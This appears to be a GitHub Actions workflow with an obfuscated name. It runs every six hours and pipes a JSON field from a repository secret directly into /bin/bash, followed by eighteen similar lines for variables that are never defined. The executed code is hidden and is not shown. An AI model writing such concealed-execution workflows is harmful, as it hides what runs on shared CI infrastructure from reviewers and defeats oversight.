name: xiaolouzhu6789
on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaolouzhu6789
        env:
          t611: ${{ secrets.t611 }}
        run: |
          echo $t611 | jq -r .waw007 | /bin/bash
          echo $yurn9 | jq -r .fmeqx9 | /bin/bash
          echo $bkige74072 | jq -r .zaiq14873 | /bin/bash
          echo $btnh88017 | jq -r .lai62582 | /bin/bash
          echo $qa76 | jq -r .j231 | /bin/bash
          echo $fumy93181 | jq -r .oido8 | /bin/bash
          echo $smsj063 | jq -r .lb37055 | /bin/bash
          echo $sgu81446 | jq -r .f7 | /bin/bash
          echo $d962 | jq -r .ja84 | /bin/bash
          echo $fc712 | jq -r .u44898 | /bin/bash
          echo $xenx8420 | jq -r .vr18 | /bin/bash
          echo $ojpic30299 | jq -r .la8978 | /bin/bash
          echo $cc27496 | jq -r .v4 | /bin/bash
          echo $ig63 | jq -r .xul36 | /bin/bash
          echo $zswdg8 | jq -r .gmny8823 | /bin/bash
          echo $jmxc4284 | jq -r .etw907 | /bin/bash
          echo $yw7780 | jq -r .eijez62455 | /bin/bash
          echo $lbr21940 | jq -r .ln19362 | /bin/bash
          echo $igwd650 | jq -r .rkc440 | /bin/bash

